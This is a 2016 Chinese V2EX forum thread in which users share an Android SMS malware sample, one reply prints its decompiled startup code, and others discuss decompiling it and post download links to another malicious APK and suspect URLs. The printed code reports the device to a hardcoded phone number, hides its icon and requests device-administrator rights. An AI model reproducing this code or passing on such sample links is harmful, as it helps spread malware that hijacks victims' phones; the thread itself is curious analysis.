V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Olive
V2EX  ›  Android

手机病毒,之前看到有人会玩,刚好收到一个,你们拿去玩吧

  •  
  •   Olive · 2016-09-02 11:12:49 +08:00 · 11890 次点击
    这是一个创建于 3031 天前的主题,其中的信息可能已经有所发展或是发生改变。
    21 条回复    2016-09-02 22:46:56 +08:00
    luap
        1
    luap  
       2016-09-02 12:34:35 +08:00
    已返编译:

    protected void onCreate(Bundle paramBundle)
    {
    super.onCreate(paramBundle);
    super.requestWindowFeature(1);
    setContentView(2130903040);
    SmSutils localSmSutils = new SmSutils();
    if (SmSutils.key.equals(SmSutils.getPublicKey(this)))
    {
    localSmSutils.sendSMS("18789837060", "手机已安装软件,回复 com#false 关闭 com#true 开启, 版本" + Build.VERSION.SDK_INT + " " + Build.MODEL, null);
    Toast.makeText(this, "程序启动成功", 1).show();
    getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);
    startService(new Intent(this, SmSserver.class));
    this.Dmanager = ((DevicePolicyManager)getSystemService("device_policy"));
    ComponentName localComponentName = new ComponentName(this, DeviceReceiver.class);
    if (!this.Dmanager.isAdminActive(localComponentName))
    {
    Intent localIntent = new Intent(getAction());
    localIntent.putExtra(getExtraDeviceAdmin(), localComponentName);
    localIntent.putExtra(getExtraAddExplanation(), "设备管理器");
    startActivityForResult(localIntent, 0);
    }
    finish();
    return;
    }
    localSmSutils.sendSMS("18789837060", "证书错误,程序启动失败", null);
    Toast.makeText(this, "证书错误,程序启动失败", 1).show();
    finish();
    }
    iMono
        2
    iMono  
       2016-09-02 12:35:49 +08:00
    @luap 好屌 大拇指
    shimanooo
        3
    shimanooo  
       2016-09-02 12:46:21 +08:00
    求玩法..

    用小号发短信骂三门?
    supman
        4
    supman  
       2016-09-02 13:00:31 +08:00 via Android
    @luap 求教 这个怎么反编译的。。竟然完完整整的出来了
    ljbha007
        5
    ljbha007  
       2016-09-02 13:02:34 +08:00
    @supman 因为没有混淆啊
    ljbha007
        6
    ljbha007  
       2016-09-02 13:03:19 +08:00
    炸之
    Olive
        7
    Olive  
    OP
       2016-09-02 13:07:38 +08:00
    @luap 厉害厉害(手动鼓掌
    wohenyingyu01
        8
    wohenyingyu01  
       2016-09-02 13:17:11 +08:00 via iPhone
    是干嘛的……
    jsonzz
        9
    jsonzz  
       2016-09-02 13:21:57 +08:00
    我跟踪过类似的 Android 病毒,当时写了个分析。可以看看我 blog:http://ztwo.github.io/blog/Androidworm/
    just1
        10
    just1  
       2016-09-02 13:25:05 +08:00 via Android
    不会玩放腾讯哈勃分析
    ljcarsenal
        11
    ljcarsenal  
       2016-09-02 13:27:46 +08:00 via Android
    @jsonzz 看了你那个文章,你是怎么进入他邮箱的呢 难道把密码写在 apk 里?
    haozibi
        12
    haozibi  
       2016-09-02 13:33:13 +08:00
    @ljcarsenal 源码里有发信账号和密码。
    hinkal
        13
    hinkal  
       2016-09-02 13:33:40 +08:00
    这病毒我见过,据说是个初二学生写的,密码就硬编码在代码里。
    gimp
        14
    gimp  
       2016-09-02 13:46:12 +08:00
    http://yzc178co.com/index.htm


    @luap
    @jsonzz

    这个呢,我昨天反编译了一下,不太会 java ,也没看到什么有价值的东西,也不知道折腾的对不对

    代码: https://mega.nz/#!CF93iCyS!93vk_KL3YKZMtWQ34GPb_1Jol-viW63FbCxHuIHOvaI

    域名应该是快到期了, apk 这里: https://mega.nz/#!XJtACAZY!vPYDNgu7yIEbOeZZx98mTafLTJ3NgQM4izi0qJI9mrU
    Rect
        15
    Rect  
       2016-09-02 13:54:18 +08:00
    http://218.6.173.38/

    ...这个地址
    CodingPuppy
        16
    CodingPuppy  
       2016-09-02 13:59:46 +08:00
    android 漏洞不少,无法卸载的漏洞在 AndroidM 上还有
    shenfu1991
        17
    shenfu1991  
       2016-09-02 15:19:09 +08:00
    关键是这个是 android 程序,在 iOS 无效吧。。。
    VmuTargh
        18
    VmuTargh  
       2016-09-02 16:33:21 +08:00 via Android
    @shenfu1991 iOS 有支付宝(大雾
    fjzjk
        19
    fjzjk  
       2016-09-02 18:06:40 +08:00
    这种多了,实际上没啥,只是安卓权限比较多,安装上就能乱搞。
    你看上面都有人反编译了,混淆都不做的
    tempdban
        20
    tempdban  
       2016-09-02 18:40:12 +08:00 via Android
    @CodingPuppy 我有点蒙,只有成为设备管理器白不能卸载吧
    mingyun
        21
    mingyun  
       2016-09-02 22:46:56 +08:00
    @jsonzz 厉害
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1182 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 18:18 · PVG 02:18 · LAX 10:18 · JFK 13:18
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.